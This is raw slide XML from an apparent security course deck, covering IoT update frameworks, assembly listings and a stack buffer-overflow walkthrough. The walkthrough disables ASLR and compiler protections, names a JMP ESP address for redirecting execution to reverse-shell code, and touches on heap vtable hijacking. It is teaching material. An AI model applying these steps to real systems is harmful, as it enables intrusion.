                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </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119</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5303F0-1AA6-B24D-A33F-3D674E3EFA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5589692" y="1842336"/>
            <a:ext cx="7108615" cy="2376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_read</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-1044(%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esi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L_.str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(%rip), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi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rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, -1056(%</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8-byte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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $0, %al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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</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-1040(%</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movslq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  -1044(%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rdx</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-1060(%</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4-byte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_read</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, -1048(%</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-1048(%</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esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326595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88927"/>
            <a:ext cx="11842955" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IoT update</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="510766" y="1838380"/>
            <a:ext cx="11170467" cy="4756151"/>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Dual image update framework (swupdate) is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  Updates in CPIO format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>CPIO header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Image 1, …, image n.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Dual image open source complete update (Mender) is </a:t>
            </a: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Incremental atomic update is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId6">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Yocto creates embedded systems distribution.  It’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId7">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You can simulate built packages with Qemu, information is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId8">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  Chapter 8 of the Yocto development manual also explains how to do qemu simulation.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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23214279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6933"/>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Assembly code for function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120</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5303F0-1AA6-B24D-A33F-3D674E3EFA68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269546" y="1557369"/>
            <a:ext cx="7108615" cy="2376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L_.str.1(%rip), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $0, %al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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</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-1040(%</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L_.str.2(%rip), %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi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-1064(%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4-byte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movb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $0, %al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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</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-1068(%</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4-byte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addq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $1072, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</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imm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0x430</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popq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retq</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cfi_endproc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18449643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Buffer overflow: technical details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426719" y="1952825"/>
            <a:ext cx="11017136" cy="2376107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Technical details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-4572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We need to disable ASLR on Linux for this attack to work: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-4572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echo 0 | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tee /proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-3429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When we compiled, we disabled compiler protection preventing the processor from executing instructions on the stack.  If the stack is not executable, we can use other “control diversion” attacks like ROP.  See: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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https://github.com/JonathanSalwan/ROPgadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>https://www.rapid7.com/resources/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-exploit-explained/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Compiler can insert “canaries” to test for buffer overflows, we’ve disabled them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Exception handling and function pointers can also be exploited by buffer overflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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Shadow stacks are being introduced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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121</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32338578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Buffer overflow: technical details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426719" y="1665818"/>
            <a:ext cx="11017136" cy="4690533"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="4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It remains to construct the character strings that implement the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sled and the code that executes the reverse shell.  We need to overwrite EIP to contain the address of the malicious code or overwrite the EIP to point to an instruction that contains a ”JMP (ESP)” instruction.  To find such an instruction, we can write a program or use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> section in the reverse engineering section).  In this case, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>0xb7facf97 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>\x97\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xcf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>xfa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>\xb7 has such an instruction (it’s in a dynamic link library).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:spcBef>
                <a:spcPts val="4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We are almost done, all we need to do is find a call to a library function that calls our reverse shell (with properly formatted arguments on the stack).  This could be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>execv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>, for example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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We’re done.  In a “real situation”, we won’t have the source code, so we’d need to reverse engineer the target binary (say with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) and we’d have to seal with ALSR (we can use “dangling pointers”) and non-executable stacks (we can use a ROP based attack).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-4572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We’ll go into more of these details in the reverse engineering section.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>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122</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37446352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65" y="151783"/>
            <a:ext cx="11630087" cy="1078951"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Heap-based control hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381965" y="1260389"/>
            <a:ext cx="11173853" cy="5461085"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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Compiler generated function pointers   (e.g.  C++ code)</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Suppose vtable is on the heap next to a string object:</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Buffer overflow can trash function pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3144892" y="17349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ptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3144892" y="20397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144892" y="23445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8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3144892" y="26493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962035" y="3069509"/>
            <a:ext cx="1000595" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>object</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="3"/>
            <a:endCxn id="12" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3983092" y="1887327"/>
            <a:ext cx="1447800" cy="356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30892" y="177061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FP1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430892" y="207541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FP2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430892" y="238021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FP3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5379252" y="2665906"/>
            <a:ext cx="981359" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
